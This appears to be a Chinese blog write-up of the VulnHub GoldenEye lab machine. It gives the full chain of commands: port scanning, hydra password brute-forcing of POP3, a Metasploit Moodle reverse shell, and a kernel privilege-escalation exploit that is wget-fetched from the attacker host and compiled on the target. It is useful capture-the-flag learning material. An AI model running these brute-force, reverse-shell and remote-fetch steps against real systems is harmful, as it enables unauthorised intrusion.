SfTian Vulnhub-Golden Eye # Golden Eye ## 扫描靶机网络信息 ```shell sudo netdiscover -r 192.168.0.0/24 ``` DHCP下发IP: 192.168.0.129 ```shell sudo masscan -p 0-65535 --rate=1000 192.168.0.129 ``` Port: 25 80 55006 55007 ## Web f12查看js发现密码被ascii编码,解码是InvincibleHack3r,js有提到2个人名boris和natalya两个人名都试了一次 400认证:boris InvincibleHack3r 登录进去说需要向POP3发邮件 利用kali的hydra爆破已知的用户名boris和natalya(这里写入到username.txt) ```shell hydra -L username.txt -P /usr/share/wordlists/fasttrack.txt 192.168.0.129 -s 55007 pop3 -vV -t 64 ``` [55007][pop3] host: 192.168.0.129 login: boris password: secret1! [55007][pop3] host: 192.168.0.129 login: natalya password: bird   拿到POP3登录信息 ```shell nc 192.168.0.129 55007 user natalya pass bird list #读取邮件 retr 1 retr 2 ``` 邮件1中提到有一个Janus的犯罪集团正在追捕GoldenEye 邮件2中获取用户信息xenia RCP90rulez!和一个网址`severnaya-station.com/gnocertdir`并提示需要配置到hosts ```shell nc 192.168.0.129 55007 user boris pass secret1! list #读取邮件 retr 1 retr 2 retr 3 ```  邮件2中natalya发邮件说可以爆破到boris的密码 邮件3中boss对Boris说要把密文藏到一个文件并把邮件删了 ## 配置hosts ```text 192.168.0.129 severnaya-station.com ``` ## 获取信息 访问`severnaya-station.com/gnocertdir`即可访问到web界面,说的`xenia RCP90rulez!`登录 经过翻找可以在`Home->My profile->Message`中找到和`Dr Doak`的对话  获取邮件用户名doak使用hydra继续爆破可得 [55007][pop3] host: 192.168.0.129 login: Doak password: goat  通过nc登录邮件可得信息 ``` username: dr_doak password: 4England! ``` 登录cms在`Home-> My home`右侧找到`My private files-> for james-> s3cret.txt`  访问`http://severnaya-station.com/dir007key/for-007.jpg`拿到一张图片,查看详细信息得到一个base64解密即可拿到admin的密码并登录cms  ## 反弹shell 主页左上角2.2.3疑似Moodle版本号,存在CVE漏洞,通过msfconsole进行反射shell [Moodle - Remote Command Execution](https://www.exploit-db.com/exploits/29324) ```shell msfconsole search moodle use 1 set USERNAME admin set PASSWORD xWinter1995x! set RHOSTS severnaya-station.com set LHOST 192.168.0.128 set LPORT 4444 set TARGETURI /gnocertdir run ```   ## 提权 [Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation - Linux local Exploit (exploit-db.com)](https://www.exploit-db.com/exploits/37292) kali查找37292可以找到对应的exp ```shell searchsploit 37292 ``` 由于靶机只有cc所以需要修改L143的gcc为cc,然后在远程靶机wget exp并编译然后运行即可提权到root ``` #kali cp /usr/share/exploitdb/exploits/linux/local/37292.c /home/kali/temp cd /home/kali/temp python -m http.server 888 #msf wget http://192.168.0.128:888 cc 37292.c ./a.out id ```  取消回复 发表新评论 提交评论
